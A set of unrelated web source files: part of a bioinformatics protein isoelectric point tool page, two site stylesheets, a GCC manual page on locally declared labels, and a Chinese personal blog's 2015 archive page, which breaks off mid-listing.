onmouseover="self.status='Generates PCR products from a template and two primer sequences.'; return true;" onmouseout="self.status=' '; return true;">-PCR Products</a><br /> <a href="protein_gravy.html" onmouseover="self.status='Returns the grand average of hydropathy value of protein sequences.'; return true;" onmouseout="self.status=' '; return true;">-Protein GRAVY</a><br /> <a href="protein_iep.html" onmouseover="self.status='Returns the predicted isoelectric point of protein sequences.'; return true;" onmouseout="self.status=' '; return true;">-Protein Isoelectric Point</a><br /> <a href="protein_mw.html" onmouseover="self.status='Calculates the molecular weight of protein sequences.'; return true;" onmouseout="self.status=' '; return true;">-Protein Molecular Weight</a><br /> <a href="protein_pattern.html" onmouseover="self.status='Returns positions of the patterns you enter.'; return true;" onmouseout="self.status=' '; return true;">-Protein Pattern Find</a><br /> <a href="protein_stats.html" onmouseover="self.status='Returns basic sequence statistics.'; return true;" onmouseout="self.status=' '; return true;">-Protein Stats</a><br /> <a href="rest_digest.html" onmouseover="self.status='Converts the sequence you enter into restriction fragments.'; return true;" onmouseout="self.status=' '; return true;">-Restriction Digest</a><br /> <a href="rest_summary.html" onmouseover="self.status='Returns the number and positions of restriction sites.'; return true;" onmouseout="self.status=' '; return true;">-Restriction Summary</a><br /> <a href="rev_trans.html" onmouseover="self.status='Can be used to convert protein into DNA.'; return true;" onmouseout="self.status=' '; return true;">-Reverse Translate</a><br /> <a href="translate.html" onmouseover="self.status='Returns the translation in the reading frame you specify.'; return true;" onmouseout="self.status=' '; return true;">-Translate</a> </div> <div class="category"> Random Sequences </div> <div class="program"> <a href="mutate_dna.html" onmouseover="self.status='Introduces random mutations into DNA sequences.'; return true;" onmouseout="self.status=' '; return true;">-Mutate DNA</a><br /> <a href="mutate_protein.html" onmouseover="self.status='Introduces random mutations into protein sequences.'; return true;" onmouseout="self.status=' '; return true;">-Mutate Protein</a><br /> <a href="random_coding_dna.html" onmouseover="self.status='Generates a random coding sequence of the length you specify.'; return true;" onmouseout="self.status=' '; return true;">-Random Coding DNA</a><br /> <a href="random_dna.html" onmouseover="self.status='Generates a random DNA sequence of the length you specify.'; return true;" onmouseout="self.status=' '; return true;">-Random DNA Sequence</a><br /> <a href="random_dna_regions.html" onmouseover="self.status='Replaces regions of the DNA sequences you enter with random bases.'; return true;" onmouseout="self.status=' '; return true;">-Random DNA Regions</a><br /> <a href="random_protein.html" onmouseover="self.status='Generates a random protein sequence of the length you specify.'; return true;" onmouseout="self.status=' '; return true;">-Random Protein Sequence</a><br /> <a href="random_protein_regions.html" onmouseover="self.status='Replaces regions of the protein sequences you enter with random residues.'; return true;" onmouseout="self.status=' '; return true;">-Random Protein Regions</a><br /> <a href="sample_dna.html" onmouseover="self.status='Samples bases from a DNA sequence with replacement.'; return true;" onmouseout="self.status=' '; return true;">-Sample DNA</a><br /> <a href="sample_protein.html" onmouseover="self.status='Samples residues from a protein sequence with replacement.'; return true;" onmouseout="self.status=' '; return true;">-Sample Protein</a><br /> <a href="shuffle_dna.html" onmouseover="self.status='Randomly shuffles the DNA sequences you enter.'; return true;" onmouseout="self.status=' '; return true;">-Shuffle DNA</a><br /> <a href="shuffle_protein.html" onmouseover="self.status='Randomly shuffles the protein sequences you enter.'; return true;" onmouseout="self.status=' '; return true;">-Shuffle Protein</a> </div> <div class="category"> Miscellaneous </div> <div class="program"> <a href="iupac.html" onmouseover="self.status='IUPAC codes for DNA and protein.'; return true;" onmouseout="self.status=' '; return true;">-IUPAC codes</a><br /> <a href="genetic_code.html" onmouseover="self.status='The genetic codes used in the Sequence Manipulation Suite.'; return true;" onmouseout="self.status=' '; return true;">-Genetic codes</a><br /> <a href="about.html" onmouseover="self.status='About the Sequence Manipulation Suite.'; return true;" onmouseout="self.status=' '; return true;">-About this site</a><br /> </div> <!-- END INSERT LINKS --> <div class="copyright"> <br /> Biological Sequence Analyisis Manipulation Suite &copy; 2016 Pazhani Ragunathan. </div> <center> <div class="program"> <a href="index.html" target="_top">home</a> </div> </center> </td><!-- PROGRAM CONTENT --> <td class="program"> <table border="0" cellspacing="0" cellpadding="2"> <tbody> <tr> <td class="sms">Biological Sequence Manipulation Suite:</td> </tr> <tr> <td class="title">Protein Isoelectric Point</td> </tr> <tr> <td class="description"> Protein Isoelectric Point calculates the theoretical pI (isoelectric point) for the protein sequence you enter. Use Protein Isoelectric Point when you want to know approximately where on a 2-D gel a particular protein will be found.<br /> <br /> <form action="" name="main_form" id="main_form"> Paste the raw sequence or one or more FASTA sequences into the text area below. Input limit is 200000 characters.<br /> <textarea rows="6" cols="61"> &gt;sequence 1 GAMPSTRV &gt;sequence 2 MPSTYLLQ </textarea><br /> <input type="button" value="Submit" name="main_submit" onclick="try{proteinIep(document)} catch(e) {alert('The following error was encountered: ' + e);}" /> <input type="button" value="Clear" onclick="document.forms[0].elements[0].value = ' '" /> <input type="reset" value="Reset" /> <ul> <li>Add <select> <option selected="selected" value="1"> 1 </option> <option value="2"> 2 </option> <option value="3"> 3 </option> <option value="4"> 4 </option> <option value="5"> 5 </option> </select> copies of <select> <option selected="selected" value=""> Nothing </option> <option value="DTYRYI"> AU1 (DTYRYI) </option> <option value="TDFYLK"> AU5 (TDFYLK) </option> <option value="QYPALT"> BTag (QYPALT) </option> <option value="EQKLISEEDL"> c-myc (EQKLISEEDL) </option> <option value="DYKDDDDK"> FLAG (DYKDDDDK) </option> <option value="MSKGEELFTGVVPILVELDGDVNGHKFSVSGEGEGDATYGKLTLKFICTTGKLPVPWPTLVTTFSYGVQCFSRYPDHMKRHDFFKSAMPEGYVQERTIFFKDDGNYKTRAEVKFEGDTLVNRIELKGIDFKEDGNILGHKLEYNYNSHNVYIMADKQKNGIKVNFKIRHNIEDGSVQLADHYQQNTPIGDGPVLLPDNHYLSTQSALSKDPNEKRDHMVLLEFVTAAGITHGMDELYK"> GFP (MSKGEELFTG...) </option> <option value="EYMPME"> Glu-Glu (EYMPME) </option> <option value="EFMPME"> Glu-Glu (EFMPME) </option> <option value="MSPILGYWKIKGLVQPTRLLLEYLEEKYEEHLYERDEGDKWRNKKFELGLEFPNLPYYIDGDVKLTQSMAIIRYIADKHNMLGGCPKERAEISMLEGAVLDIRYGVSRIAYSKDFETLKVDFLSKLPEMLKMFEDRLCHKTYLNGDHVTHPDFMLYDALDVVLYMDPMCLDAFPKLVCFKKRIEAIPQIDKYLKSSKYIAWPLQGWQATFGGGDHPPKSDLVPRGSPGIHRD"> GST (MSPILGYWKI...) </option> <option value="YPYDVPDYA"> HA (YPYDVPDYA) </option> <option value="HHHHHH"> His6 (HHHHHH) </option> <option value="QPELAPEDPED"> HSV (QPELAPEDPE...) </option> <option value="HTTPHH"> HTTPHH (HTTPHH) </option> <option value="RYIRS"> IRS (RYIRS) </option> <option value="PPEPET"> KT3 (PPEPET) </option> <option value="EDQVDPRLIDGK"> Protein C (EDQVDPRLID...) </option> <option value="KETAAAKFERQHMDS"> S-Tag (KETAAAKFER...) </option> <option value="MDEKTTGWRGGHVVEGLAGELEQLRARLEHHPQGQREP"> SBP (MDEKTTGWRG...) </option> <option value="MASMTGGQQMG"> T7 (MASMTGGQQM...) </option> <option value="GKPIPNPLLGLDST"> V5 (GKPIPNPLLG...) </option> <option value="MNRLGK"> VSV-G (MNRLGK) </option> </select> to the above sequence.</li> <li>Use pK values from <select> <option selected="selected" value="emboss"> EMBOSS </option> <option value="dtaselect"> DTASelect </option> </select></li> </ul> </form>*This page requires JavaScript.<br /> <br /> <center> <a href="protein_iep.html" target="_blank">new window</a> | <a href="index.html">home</a> </center><span class="version">Mon Nov 31 22:17:06 2016</span> </td> </tr> <tr> <td><span class="valid">Valid XHTML 1.0; Valid CSS</span></td> </tr> </tbody> </table><!-- MAIN TABLE END --> </td> </tr> </tbody> </table> </body> </html>
wp-content/themes/Metrolium-qm/css/_shared_styles.css
Abolitionist-Project/Think-by-Numbers
/**************/ /* Date Range */ /**************/ #ui-datepicker-div { width: 263px; z-index: 1100000 !important; } #accordion-date-content input[type=text]{ display: block; background-color: #F6F6F6; color: #555555; height: 35px; border: solid 1px #ddd; border-radius: 4px; margin-bottom: 12px; text-align: center; width: 100%; } #accordion-content-rangepickers{ margin-left: auto; margin-right: auto; } #accordion-content-rangepickers .ui-button-text{ padding: .4em 0em; } #accordion-content-rangepickers .ui-button { font-size: 1em; width: 25%; } /**************/ /*Var Settings*/ /**************/ #accordion-settings-header{ color: #29bdca; background: #fff; border-bottom: solid 3px #229DA5; cursor: auto; } .buttonrow-2{ margin: auto; width: 49%; } #accordion-settings-content b{ font-size: 1.05em; display:block; color: #29bdca; } #accordion-settings-content table{ border: none; margin:0px; border-collapse:collapse; } #accordion-settings-content td{ padding-bottom:4px; padding-top: 4px; border: none; vertical-align:middle; } #accordion-settings-content td:first-child{ padding-left:8px; } #accordion-settings-content td:last-child{ float:right; height: 40px; line-height:20px; width: 150px; } #accordion-settings-content div{ padding-left: 8px; padding-bottom:4px; padding-top: 4px; border: none; vertical-align:middle; } #accordion-settings-content .ui-sortable{ list-style: none; } #accordion-settings-content .ui-sortable li { height:30px; background:none; border: none; } #accordion-settings-content .ui-sortable li label { line-height:28px; vertical-align:middle; font-weight: normal; color: gray; } #accordion-settings-content .ui-sortable li span{ display:inline-block; vertical-align:middle; } #accordion-settings-content input[type="radio"]{ vertical-align:middle; } #accordion-settings-content input[type="radio"] + label{ vertical-align: middle; padding-left: 8px; } #accordion-settings-content td:first-child{ white-space: nowrap; } #joinedVariablePicker{ opacity: 0; width: 0px; height: 30px; margin-top: 3px; padding-top:4px; transition: all 0.5s ease-in-out; -webkit-transition: all 0.5s ease-in-out; -moz-transition: all 0.5s ease-in-out; } #joinedVariablePicker.active { opacity: 1; width :230px; } #addJoinedVariableButton{ display: inline; width: 36px; height: 36px; margin-left:-24px; background-color: #cccccc; border: none; background: url('https://i.imgur.com/jf3AOBR.png'); background-size: 28px 28px; background-repeat: no-repeat; background-position: center; box-shadow: none; -webkit-box-shadow: none; transition: all 0.4s ease-in-out; -webkit-transition: all 0.4s ease-in-out; -moz-transition: all 0.4s ease-in-out; -o-transition: all 0.4s ease-in-out; } #addJoinedVariableButton.active { margin-left: 0px; background: url('https://i.imgur.com/BHtx79d.png'); background-size: 28px 28px; background-repeat: no-repeat; background-position: center; -webkit-box-shadow: none; } #addJoinedVariableButton:hover{ -webkit-filter: drop-shadow(0px 0px 2px rgba(0,0,0,0.3)); filter: url(https://i.imgur.com/BewrlqD.png#drop-shadow); background: url('https://i.imgur.com/BewrlqD.png'); background-size: 28px 28px; background-repeat: no-repeat; background-position: center; } #addJoinedVariableButton.active:hover{ -webkit-filter: drop-shadow(0px 0px 2px rgba(0,0,0,0.3)); filter: url(https://i.imgur.com/enilel9.png#drop-shadow); background: url('https://i.imgur.com/enilel9.png'); background-size: 28px 28px; background-repeat: no-repeat; background-position: center; } #joinedVariablesList{ margin-bottom: 0; list-style: none; } #joinedVariablesList div{ cursor: pointer; float: right; width: 14px; height: 14px; opacity: 0; background-image: url('http://i.imgur.com/38DdMfw.png'); background-size: 18px 18px; background-position: center; background-repeat:no-repeat; border: none; transition: all 0.2s ease-in-out; -webkit-transition: all 0.2s ease-in-out; -moz-transition: all 0.2s ease-in-out; -o-transition: all 0.2s ease-in-out; } #joinedVariablesList div:hover{ background: url('https://i.imgur.com/TGEwylD.png'); background-size: 18px 18px; background-position: center; background-repeat:no-repeat; } #joinedVariablesList li:hover{ color: #29bdca; } #joinedVariablesList li:hover div { opacity: 1; } /***********************/ /* Delete measurements */ /***********************/ #deletemeasurement-dialog-background{ display: none; opacity: 0; } #deletemeasurement-dialog{ display: none; max-width: 500px; opacity: 0; } .deletemeasurement-dialog{ overflow: hidden; padding: 10px; background: #fbfbfb; -webkit-border-radius: 3px; border-radius: 3px; z-index: 1000001; position: fixed; width: 430px; top: 30%; left:50%; margin-left:-215px; margin-right:0px; } #deletemeasurement-dialog-header{ color: #fff; background: #29bdca; border-bottom: solid 3px #229DA5; cursor: auto; } .deletemeasurement-header { width: 100%; height: 42px; color: #fff; display: block; font-size: 1.2em; text-indent: 14px; cursor: pointer; margin-top: 5px; } #deletemeasurement-dialog-content table { margin-top: 5px; } #deletemeasurement-dialog-content table tr td { border:none; } /**************************/ /* Loading overlay config */ /**************************/ .loading-overlay-content, .loading-overlay{ display: none; opacity: 0; width: 100%; height: 100%; position: absolute; top: 0; left: 0; background-image: url('/wp-content/themes/metrolium-qm/plugins/login-with-ajax/loading.gif'); background-position: center center; background-repeat: no-repeat; transition: all 0.5s ease-in-out; -webkit-transition: all 0.5s ease-in-out; -moz-transition: all 0.5s ease-in-out; } /********************/ /* Add measurements */ /********************/ #addmeasurement-dialog-background{ display: none; opacity: 0; } #addmeasurement-dialog{ display: none; max-width: 500px; opacity: 0; } #addmeasurement-dialog-content{ overflow:hidden; width: 100%; box-sizing:border-box; background-color: #FFFFFF; padding-left: 5%; padding-right: 5%; margin-left: auto; margin-right: auto; border-bottom: solid 3px #DDDDDD; border-bottom-left-radius: 3px; border-bottom-right-radius: 3px; } .addmeasurement-header{ width: 100%; height: 42px; color: #fff; display: block; font-size: 1.2em; text-indent: 14px; cursor: pointer; margin-top: 12px; } .addmeasurement-content{ overflow:hidden; width: 100%; box-sizing:border-box; background-color: #FFFFFF; padding-left: 5%; padding-right: 5%; margin-left: auto; margin-right: auto; border-bottom: solid 3px #DDDDDD; border-bottom-left-radius: 3px; border-bottom-right-radius: 3px; } .addmeasurement-content .inner{ padding-top: 12px; padding-bottom: 12px; } #addmeasurement-dialog-header{ color: #fff; background: #29bdca; border-bottom: solid 3px #229DA5; cursor: auto; } #addmeasurement-dialog-content b{ font-size: 1.05em; display:block; color: #29bdca; } #addmeasurement-dialog-content table{ border: none; margin:0px; margin-bottom: 10px; border-collapse:collapse; } #addmeasurement-dialog-content td{ padding-bottom:4px; padding-top: 4px; border: none; vertical-align:middle; } #addmeasurement-dialog-content td:first-child{ padding-left:8px; } #addmeasurement-dialog-content td:last-child{ float:right; height: 40px; line-height:20px; width: 140px; } #addmeasurement-dialog-content div{ padding-left: 8px; padding-bottom:4px; padding-top: 4px; border: none; vertical-align:middle; } #addmeasurement-dialog-content td:first-child{ white-space: nowrap; } .ui-autocomplete { position: absolute; cursor: default; z-index:1200000 !important; } .ui-autocomplete-category { font-weight: bold; padding: .2em .4em; margin: .8em 0 .2em; line-height: 1.5; } .xdsoft_datetimepicker { z-index:1200000 !important; } /***************************************/ /* Left menubar */ /***************************************/ .accordion-header{ width: 100%; height: 42px; display: block; font-size: 1.2em; text-indent: 14px; margin-top: 12px; } .accordion-content{ overflow:hidden; width: 100%; box-sizing:border-box; background-color: #FFFFFF; padding-left: 5%; padding-right: 5%; margin-left: auto; margin-right: auto; border-bottom: solid 3px #DDDDDD; border-bottom-left-radius: 3px; border-bottom-right-radius: 3px; } .accordion-content .inner{ padding-top: 12px; padding-bottom: 12px; } .accordion-content .inner .unitlabel{ width: 40%; vertical-align: middle; line-height: 160%; margin-left: 10px; display: inline; padding-left: 10px; margin-top: -20%; float: right; } /**************************************************/ /* Helper class for show/hide element transitions */ /**************************************************/ .transitions { transition: all 0.5s ease-in-out; -webkit-transition: all 0.5s ease-in-out; -moz-transition: all 0.5s ease-in-out; -o-transition: all 0.5s ease-in-out; } /*************/ /* gear icon */ /*************/ .gear-icon{ cursor: pointer; margin-top: 7px; margin-right: 7px; width: 28px; height:28px; float: right; background:url('https://i.imgur.com/dw7YcYP.png'); background-repeat: no-repeat; background-size: contain; } .gear-icon:hover{ background-image: url('https://i.imgur.com/WDuw5IF.png'); } /***********/ /* Dialogs */ /***********/ .dialog-header { float: left; line-height: 42px; } .dialog{ overflow: hidden; padding: 10px; background: #fbfbfb; -webkit-border-radius: 3px; border-radius: 3px; z-index: 1000001; position: fixed; width: 280px; height: 290px; top: 30%; left: 0; right: 0; margin-left: auto; margin-right: auto; } @media (max-width: 767px) { .dialog { top: 100px; } } .dialog-background{ position: fixed; top: 0; bottom: 0; left: 0; right: 0; background: #000; opacity: .5; z-index: 1000000; } #login-dialog table{ border: none; margin:0px; border-collapse:collapse; } #login-dialog td{ border: none; vertical-align:middle; } #share-dialog-background{ display: none; opacity: 0; } #share-dialog{ display: none; max-width: 500px; opacity: 0; }
bin/arm-2012.09/share/doc/arm-arm-none-eabi/html/gcc/Local-Labels.html
Motorhead1991/samsung_kernel_comanche
<html lang="en"> <head> <title>Local Labels - Using the GNU Compiler Collection (GCC)</title> <meta http-equiv="Content-Type" content="text/html"> <meta name="description" content="Using the GNU Compiler Collection (GCC)"> <meta name="generator" content="makeinfo 4.13"> <link title="Top" rel="start" href="index.html#Top"> <link rel="up" href="C-Extensions.html#C-Extensions" title="C Extensions"> <link rel="prev" href="Statement-Exprs.html#Statement-Exprs" title="Statement Exprs"> <link rel="next" href="Labels-as-Values.html#Labels-as-Values" title="Labels as Values"> <link href="http://www.gnu.org/software/texinfo/" rel="generator-home" title="Texinfo Homepage"> <!-- Copyright (C) 1988, 1989, 1992, 1993, 1994, 1995, 1996, 1997, 1998, 1999, 2000, 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008, 2009, 2010 Free Software Foundation, Inc. Permission is granted to copy, distribute and/or modify this document under the terms of the GNU Free Documentation License, Version 1.3 or any later version published by the Free Software Foundation; with the Invariant Sections being ``Funding Free Software'', the Front-Cover Texts being (a) (see below), and with the Back-Cover Texts being (b) (see below). A copy of the license is included in the section entitled ``GNU Free Documentation License''. (a) The FSF's Front-Cover Text is: A GNU Manual (b) The FSF's Back-Cover Text is: You have freedom to copy and modify this GNU Manual, like GNU software. Copies published by the Free Software Foundation raise funds for GNU development.--> <meta http-equiv="Content-Style-Type" content="text/css"> <style type="text/css"><!-- pre.display { font-family:inherit } pre.format { font-family:inherit } pre.smalldisplay { font-family:inherit; font-size:smaller } pre.smallformat { font-family:inherit; font-size:smaller } pre.smallexample { font-size:smaller } pre.smalllisp { font-size:smaller } span.sc { font-variant:small-caps } span.roman { font-family:serif; font-weight:normal; } span.sansserif { font-family:sans-serif; font-weight:normal; } --></style> <link rel="stylesheet" type="text/css" href="../cs.css"> </head> <body> <div class="node"> <a name="Local-Labels"></a> <p> Next:&nbsp;<a rel="next" accesskey="n" href="Labels-as-Values.html#Labels-as-Values">Labels as Values</a>, Previous:&nbsp;<a rel="previous" accesskey="p" href="Statement-Exprs.html#Statement-Exprs">Statement Exprs</a>, Up:&nbsp;<a rel="up" accesskey="u" href="C-Extensions.html#C-Extensions">C Extensions</a> <hr> </div> <h3 class="section">6.2 Locally Declared Labels</h3> <p><a name="index-local-labels-2336"></a><a name="index-macros_002c-local-labels-2337"></a> GCC allows you to declare <dfn>local labels</dfn> in any nested block scope. A local label is just like an ordinary label, but you can only reference it (with a <code>goto</code> statement, or by taking its address) within the block in which it was declared. <p>A local label declaration looks like this: <pre class="smallexample"> __label__ <var>label</var>; </pre> <p class="noindent">or <pre class="smallexample"> __label__ <var>label1</var>, <var>label2</var>, /* <span class="roman">...</span> */; </pre> <p>Local label declarations must come at the beginning of the block, before any ordinary declarations or statements. <p>The label declaration defines the label <em>name</em>, but does not define the label itself. You must do this in the usual way, with <var>label</var><code>:</code>, within the statements of the statement expression. <p>The local label feature is useful for complex macros. If a macro contains nested loops, a <code>goto</code> can be useful for breaking out of them. However, an ordinary label whose scope is the whole function cannot be used: if the macro can be expanded several times in one function, the label will be multiply defined in that function. A local label avoids this problem. For example: <pre class="smallexample"> #define SEARCH(value, array, target) \ do { \ __label__ found; \ typeof (target) _SEARCH_target = (target); \ typeof (*(array)) *_SEARCH_array = (array); \ int i, j; \ int value; \ for (i = 0; i &lt; max; i++) \ for (j = 0; j &lt; max; j++) \ if (_SEARCH_array[i][j] == _SEARCH_target) \ { (value) = i; goto found; } \ (value) = -1; \ found:; \ } while (0) </pre> <p>This could also be written using a statement-expression: <pre class="smallexample"> #define SEARCH(array, target) \ ({ \ __label__ found; \ typeof (target) _SEARCH_target = (target); \ typeof (*(array)) *_SEARCH_array = (array); \ int i, j; \ int value; \ for (i = 0; i &lt; max; i++) \ for (j = 0; j &lt; max; j++) \ if (_SEARCH_array[i][j] == _SEARCH_target) \ { value = i; goto found; } \ value = -1; \ found: \ value; \ }) </pre> <p>Local label declarations also make the labels they declare visible to nested functions, if there are any. See <a href="Nested-Functions.html#Nested-Functions">Nested Functions</a>, for details. </body></html>
css/style.css
JacobHorne/citizens
/*css file*/ .logodiv{ width: 960px; margin: 0 auto; background-color: black; } body{ font-family: Arial, serif; background-color: #ddeaf0; display: block; } h1, h2, { color: #013a65; } .greentextbox h1{ text-align: center; } .wrapper{ width: 960px; margin: 0 auto; } .main_content{ padding: 25px; background-color: white; border-radius: 10px; } #navbar{ font-family: Arial, serif; background: #eef0ef; width: 100%; height: 50px; margin: 0 auto; border-radius: 10px; margin-bottom: 30px; } #navbar ul{ list-style: none; margin: 0; padding: 0; display: block; text-align: center; } #navbar li{ display: inline-block; margin: 5px 10px; } #navbar a{ text-decoration: none; color: #013a65; display: block; font-weight: bold; font-size: 1.3em; text-shadow: 0 -2px 2px rgba(0, 0, 0, 0.5); padding: 10px; } .indexpicture{ float: left; } .greentextbox{ width: 100%; background: #669696; height: 125px; padding-bottom: 40px; position: relative; display: inline-block; } .greentextbox p{ color: white; text-align: center; } .darkbutton{ text-decoration: none; list-style: none; height: 50px; line-height: 50px; width: 150px; margin: 0; padding: 0; color: white; font-size: 15px; text-align: center; background-color: #3e6e6e; position: absolute; right: 20px; bottom: 20px; border-radius: 5px; } .indextext{ padding-bottom: 10px; } .bottomwrapper{ width: 100%; background-color: black; height: 400px; } .bottombox1{ width: 45%; height: 250px; background-color: #f1f1f1; border-radius: 5px; padding-bottom: 40px; } .bottombox2{ width: 45%; height: 250px; background-color: white; border-radius: 5px; float: right; } #footer{ font-family: Arial, serif; width: 100%; height: 50px; margin: 0 auto; } #footer ul{ list-style: none; margin: 0; padding: 0; display: block; text-align: center; } #footer li{ display: inline-block; margin: 5px 10px; } #footer a{ text-decoration: none; color: #013a65; display: block; font-weight: bold; font-size: .5em; padding: 10px; } .contactpicture{ float: right; } li{ text-decoration: none; list-style: none; font-size: 65%; margin: 5px; color: #063d5b; } fieldset{ width:95%; background-color: white; } label{ width: 60%; } .submitbutton{ } .containter1{ width: 100%; background-color: black; } .climatetable{ width:45%; height: 50px; float: left; } .headlines{ width: 45%; height: 500px; float: left; } .community{ width:45%; height: 50px; float:left; } .boardtable{ width: 45%; height: 500px; clear: both; } table{ border: white; } .blueribbon{ float:right; }
archives/2015/index.html
oylwhu/oylwhu.github.io
<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge" > <title>Archives: 2015 | Oylwhu Blog</title> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <meta name="description"> <meta property="og:type" content="website"> <meta property="og:title" content="Oylwhu Blog"> <meta property="og:url" content="http://yoursite.com/archives/2015/index.html"> <meta property="og:site_name" content="Oylwhu Blog"> <meta property="og:description"> <meta name="twitter:card" content="summary"> <meta name="twitter:title" content="Oylwhu Blog"> <meta name="twitter:description"> <link rel="alternative" href="/atom.xml" title="Oylwhu Blog" type="application/atom+xml"> <link rel="icon" href="/img/favicon.ico"> <link rel="stylesheet" href="/css/style.css" type="text/css"> </head> <body> <div id="container"> <div class="left-col"> <div class="overlay"></div> <div class="intrude-less"> <header id="header" class="inner"> <a href="/" class="profilepic"> <img lazy-src="http://7xract.com1.z0.glb.clouddn.com/favicon.png" class="js-avatar"> </a> <hgroup> <h1 class="header-author"><a href="/">Oylwhu Blog</a></h1> </hgroup> <div class="switch-btn"> <div class="icon"> <div class="icon-ctn"> <div class="icon-wrap icon-house" data-idx="0"> <div class="birdhouse"></div> <div class="birdhouse_holes"></div> </div> <div class="icon-wrap icon-ribbon hide" data-idx="1"> <div class="ribbon"></div> </div> <div class="icon-wrap icon-me hide" data-idx="3"> <div class="user"></div> <div class="shoulder"></div> </div> </div> </div> <div class="tips-box hide"> <div class="tips-arrow"></div> <ul class="tips-inner"> <li>菜单</li> <li>标签</li> <li>关于我</li> </ul> </div> </div> <div class="switch-area"> <div class="switch-wrap"> <section class="switch-part switch-part1"> <nav class="header-menu"> <ul> <li><a href="/">主页</a></li> <li><a href="/archives">所有文章</a></li> </ul> </nav> <nav class="header-nav"> <div class="social"> <a class="github" target="_blank" href="https://github.com/oylwhu" title="github">github</a> <a class="weibo" target="_blank" href="https://github.com/oylwhu" title="weibo">weibo</a> <a class="zhihu" target="_blank" href="https://github.com/oylwhu" title="zhihu">zhihu</a> <a class="facebook" target="_blank" href="https://github.com/oylwhu" title="facebook">facebook</a> </div> </nav> </section> <section class="switch-part switch-part2"> <div class="widget tagcloud" id="js-tagcloud"> <a href="/tags/hadoop/" style="font-size: 10px;">hadoop</a> <a href="/tags/network/" style="font-size: 15px;">network</a> <a href="/tags/学习笔记/" style="font-size: 20px;">学习笔记</a> </div> </section> <section class="switch-part switch-part3"> <div id="js-aboutme">短暂年华,绚丽人生。用那个青春的热血点燃未来的希望,让人生的每一个角落都色彩飞扬。让那犹如白纸的未来色彩斑斓,不再单调,让我们的人生像一部电影不断演绎精彩的每一个片段。</div> </section> </div> </div> </header> </div> </div> <div class="mid-col"> <nav id="mobile-nav"> <div class="overlay"> <div class="slider-trigger"></div> <h1 class="header-author js-mobile-header hide">Oylwhu Blog</h1> </div> <div class="intrude-less"> <header id="header" class="inner"> <div class="profilepic"> <img lazy-src="http://7xract.com1.z0.glb.clouddn.com/favicon.png" class="js-avatar"> </div> <hgroup> <h1 class="header-author">Oylwhu Blog</h1> </hgroup> <nav class="header-menu"> <ul> <li><a href="/">主页</a></li> <li><a href="/archives">所有文章</a></li> <div class="clearfix"></div> </ul> </nav> <nav class="header-nav"> <div class="social"> <a class="github" target="_blank" href="https://github.com/oylwhu" title="github">github</a> <a class="weibo" target="_blank" href="https://github.com/oylwhu" title="weibo">weibo</a> <a class="zhihu" target="_blank" href="https://github.com/oylwhu" title="zhihu">zhihu</a> <a class="facebook" target="_blank" href="https://github.com/oylwhu" title="facebook">facebook</a> </div> </nav> </header> </div> </nav> <div class="body-wrap"> <section class="archives-wrap"> <div class="archive-year-wrap"> <a href="/archives/2015" class="archive-year">2015</a> </div> <div class="archives"> <article class="archive-article archive-type-post"> <div class="archive-article-inner"> <header class="archive-article-header"> <div class="article-meta"> <a href="/2015/10/12/Job的MapReduce Task初始化/" class="archive-article-date"> <time datetime="2015-10-12T12:32:10.000Z" itemprop="datePublished">10月 12</time> </a> </div> <h1 itemprop="name"> <a class="archive-article-title" href="/2015/10/12/Job的MapReduce Task初始化/">Job的Map/Reduce Task初始化</a> </h1> <div class="article-info info-on-right"> <div class="article-tag tagcloud"> <ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/hadoop/">hadoop</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/学习笔记/">学习笔记</a></li></ul> </div> </div> <div class="clearfix"></div> </header> </div> </article> <article class="archive-article archive-type-post"> <div class="archive-article-inner"> <header class="archive-article-header"> <div class="article-meta"> <a href="/2015/10/10/Job提交的过程/" class="archive-article-date"> <time datetime="2015-10-10T04:34:18.000Z" itemprop="datePublished">10月 10</time> </a> </div> <h1 itemprop="name"> <a class="archive-article-title" href="/2015/10/10/Job提交的过程/">Job提交的过程</a> </h1> <div class="article-info info-on-right"> <div class="article-tag tagcloud"> <ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/hadoop/">hadoop</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/学习笔记/">学习笔记</a></li></ul> </div> </div> <div class="clearfix"></div> </header> </div> </article> <article class="archive-article archive-type-post"> <div class="archive-article-inner"> <header class="archive-article-header"> <div class="article-meta"> <a href="/2015/10/03/MapReduce框架详解/" class="archive-article-date"> <time datetime="2015-10-03T11:33:02.000Z" itemprop="datePublished">10月 3</time> </a> </div> <h1 itemprop="name"> <a class="archive-article-title" href="/2015/10/03/MapReduce框架详解/">MapReduce框架详解</a> </h1> <div class="article-info info-on-right"> <div class="article-tag tagcloud"> <ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/hadoop/">hadoop</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/学习笔记/">学习笔记</a></li></ul> </div> </div> <div class="clearfix"></div> </header> </div> </article> <article class="archive-article archive-type-post"> <div class="archive-article-inner"> <header class="archive-article-header"> <div class="article-meta"> <a href="/2015/10/02/MapReduce实例浅析/" class="archive-article-date"> <time datetime="2015-10-02T07:23:12.000Z" itemprop="datePublished">10月 2</time> </a> </div> <h1 itemprop="name"> <a class="archive-article-title" href="/2015/10/02/MapReduce实例浅析/">MapReduce实例浅析</a> </h1> <div class="article-info info-on-right"> <div class="article-tag tagcloud"> <ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/hadoop/">hadoop</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/学习笔记/">学习笔记</a></li></ul> </div> </div> <div class="clearfix"></div> </header> </div> </article> <article class="archive-article archive-type-post"> <div class="archive-article-inner"> <header class="archive-article-header"> <div class="article-meta"> <a href="/2015/03/01/TCP窗口滑动以及拥塞控制/" class="archive-article-date"> <time datetime="2015-03-01T02:13:21.000Z" itemprop="datePublished">3月 1</time> </a> </div> <h1 itemprop="name"> <a class="archive-article-title" href="/2015/03/01/TCP窗口滑动以及拥塞控制/">TCP窗口滑动以及拥塞控制</a> </h1> <div class="article-info info-on-right"> <div class="article-tag tagcloud"> <ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/network/">network</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" 